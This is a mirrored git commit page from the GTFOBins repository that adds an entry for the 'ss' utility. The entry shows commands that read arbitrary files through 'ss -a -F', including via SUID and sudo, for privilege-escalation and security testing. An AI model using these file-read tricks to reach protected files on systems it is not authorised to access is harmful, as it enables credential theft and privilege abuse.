mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
New command: ss
This commit is contained in:
parent
a8458733ea
commit
bde35dc4c7
17
_gtfobins/ss.md
Normal file
17
_gtfobins/ss.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is limited to the first line and corrupted by an error message.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ss -a -F "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ss -a -F "$LFILE"
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ss -a -F "$LFILE"
|
||||
---
|
Loading…
Reference in New Issue
Block a user